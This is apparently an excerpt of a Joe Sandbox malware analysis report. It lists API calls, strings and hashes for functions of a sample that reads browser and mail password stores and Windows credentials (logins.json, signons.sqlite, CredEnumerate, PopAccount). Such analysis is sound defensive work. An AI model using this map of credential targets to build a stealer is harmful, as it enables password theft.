                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                      • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                      APIs
                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                      • strlen.MSVCRT ref: 0040F139
                                                      • strlen.MSVCRT ref: 0040F147
                                                      • memset.MSVCRT ref: 0040F187
                                                      • strlen.MSVCRT ref: 0040F196
                                                      • strlen.MSVCRT ref: 0040F1A4
                                                      • memset.MSVCRT ref: 0040F1EA
                                                      • strlen.MSVCRT ref: 0040F1F9
                                                      • strlen.MSVCRT ref: 0040F207
                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                      • API String ID: 2003275452-3138536805
                                                      • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                      • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                      APIs
                                                      • memset.MSVCRT ref: 0040C3F7
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                      • strrchr.MSVCRT ref: 0040C417
                                                      • _mbscat.MSVCRT ref: 0040C431
                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                      • API String ID: 1012775001-1343505058
                                                      • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                      • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                      APIs
                                                      • memset.MSVCRT ref: 00444612
                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                      • strlen.MSVCRT ref: 0044462E
                                                      • memset.MSVCRT ref: 00444668
                                                      • memset.MSVCRT ref: 0044467C
                                                      • memset.MSVCRT ref: 00444690
                                                      • memset.MSVCRT ref: 004446B6
                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                      • String ID: salu
                                                      • API String ID: 3691931180-4177317985
                                                      • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                      • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                      • API String ID: 2449869053-232097475
                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040957B
                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                      • sprintf.MSVCRT ref: 004095EB
                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                      • memset.MSVCRT ref: 0040961C
                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                      • String ID: caption$dialog_%d$menu_%d
                                                      • API String ID: 3259144588-3822380221
                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                      APIs
                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                      • API String ID: 2449869053-4258758744
                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                      APIs
                                                      • wcsstr.MSVCRT ref: 0040426A
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                      • strchr.MSVCRT ref: 004042F6
                                                      • strlen.MSVCRT ref: 0040430A
                                                      • sprintf.MSVCRT ref: 0040432B
                                                      • strchr.MSVCRT ref: 0040433C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                      • String ID: %s@gmail.com$www.google.com
                                                      • API String ID: 3866421160-4070641962
                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                      • API String ID: 2360744853-2229823034
                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                      APIs
                                                      • strchr.MSVCRT ref: 004100E4
                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                      • _mbscat.MSVCRT ref: 0041014D
                                                      • memset.MSVCRT ref: 00410129
                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                      • memset.MSVCRT ref: 00410171
                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                      • _mbscat.MSVCRT ref: 00410197
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                      • String ID: \systemroot
                                                      • API String ID: 912701516-1821301763
                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                      APIs
                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$strlen
                                                      • String ID: -journal$-wal$immutable$nolock
                                                      • API String ID: 2619041689-3408036318
                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                      APIs
                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                      • wcslen.MSVCRT ref: 0040874A
                                                      • wcsncmp.MSVCRT ref: 00408794
                                                      • memset.MSVCRT ref: 0040882A
                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                      • wcschr.MSVCRT ref: 0040889F
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                      • String ID: J$Microsoft_WinInet
                                                      • API String ID: 3318079752-260894208
                                                      • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                      • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                      APIs
                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                      • API String ID: 888011440-2039793938
                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                      APIs
                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                      • strchr.MSVCRT ref: 0040327B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringstrchr
                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                      • API String ID: 1348940319-1729847305
                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                      APIs
                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                      • API String ID: 3510742995-3273207271
                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                      APIs
                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                      • strchr.MSVCRT ref: 0040371F
                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                      • strlen.MSVCRT ref: 00403778
                                                      • sprintf.MSVCRT ref: 0040379C
                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
